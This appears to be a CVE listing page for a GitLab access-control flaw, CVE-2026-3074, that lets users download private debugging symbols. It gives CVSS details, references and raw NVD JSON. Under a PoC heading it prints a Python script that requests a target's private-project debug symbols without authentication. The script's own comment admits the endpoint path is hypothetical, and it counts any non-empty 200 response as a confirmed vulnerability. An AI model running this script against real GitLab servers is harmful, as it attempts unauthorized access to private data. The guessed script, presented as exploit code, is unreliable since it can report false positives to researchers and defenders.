CVE-2026-3074

Description

GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to download private debugging symbols from inaccessible projects due to improper access control.

CVSS Details

CVSS Score

4.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

GitLab CE/EE >= 16.7, < 18.9.7

GitLab CE/EE >= 18.10, < 18.10.6

GitLab CE/EE >= 18.11, < 18.11.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def check_poc(target_url, project_id):
    # Construct the vulnerable endpoint for debug symbols
    # Note: The exact endpoint path is hypothetical based on the vulnerability description
    endpoint = f"{target_url.rstrip('/')}/-/debug_symbols/{project_id}/download"
    
    headers = {
        "User-Agent": "CVE-2026-3074-Scanner"
    }

    try:
        # Sending request without authentication (as per description)
        response = requests.get(endpoint, headers=headers, timeout=10)
        
        if response.status_code == 200:
            # Check if content type suggests a binary/symbol file
            if "application/octet-stream" in response.headers.get("Content-Type", "") or len(response.content) > 0:
                print(f"[+] Vulnerability Confirmed! Downloaded debug symbols for project {project_id}.")
                print(f"[+] Response Size: {len(response.content)} bytes")
                return True
        else:
            print(f"[-] Exploit failed. Status Code: {response.status_code}")
            return False
            
    except Exception as e:
        print(f"[!] Error occurred: {e}")
        return False

if __name__ == "__main__":
    target = "https://gitlab.target.com"
    pid = "12345" # Private Project ID
    check_poc(target, pid)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-3074
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-3074
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-3074/
[4] VulDB https://vuldb.com/cve/CVE-2026-3074
[5] https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/
[6] https://gitlab.com/gitlab-org/gitlab/-/work_items/591229
[7] https://hackerone.com/reports/3556163

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-3074", "sourceIdentifier": "[email protected]", "published": "2026-05-14T06:16:22.400", "lastModified": "2026-05-14T16:20:43.240", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "GitLab has remediated an issue in GitLab CE/EE affecting all versions from 16.7 before 18.9.7, 18.10 before 18.10.6, and 18.11 before 18.11.3 that could have allowed an unauthenticated user to download private debugging symbols from inaccessible projects due to improper access control."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://about.gitlab.com/releases/2026/05/13/patch-release-gitlab-18-11-3-released/", "source": "[email protected]"}, {"url": "https://gitlab.com/gitlab-org/gitlab/-/work_items/591229", "source": "[email protected]"}, {"url": "https://hackerone.com/reports/3556163", "source": "[email protected]"}]}}